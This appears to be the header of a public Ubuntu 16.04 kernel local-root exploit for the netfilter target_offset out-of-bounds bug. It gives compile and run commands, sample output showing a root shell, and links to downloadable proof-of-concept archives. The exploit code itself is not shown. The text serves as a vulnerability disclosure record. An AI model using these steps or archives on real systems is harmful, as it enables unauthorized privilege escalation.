Source: https://twitter.com/vnik5287/status/748843859065483264

/**
 * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
 * check_compat_entry_size_and_hooks/check_entry
 *
 * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
 *
 * Vitaly Nikolenko
 * vnik@cyseclabs.com
 * 23/04/2016
 *
 *
 * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
 * automatic loading).
 *
 * vnik@ubuntu:~$ uname -a
 * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
 * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
 * vnik@ubuntu:~$ ./decr
 * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
 * [!] Decrementing the refcount. This may take a while...
 * [!] Wait for the "Done" message (even if you'll get the prompt back).
 * vnik@ubuntu:~$ [+] Done! Now run ./pwn
 *
 * vnik@ubuntu:~$ ./pwn
 * [+] Escalating privs...
 * root@ubuntu:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * root@ubuntu:~#
 *
 */

Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
https://cyseclabs.com/exploits/target_offset_vnik.zip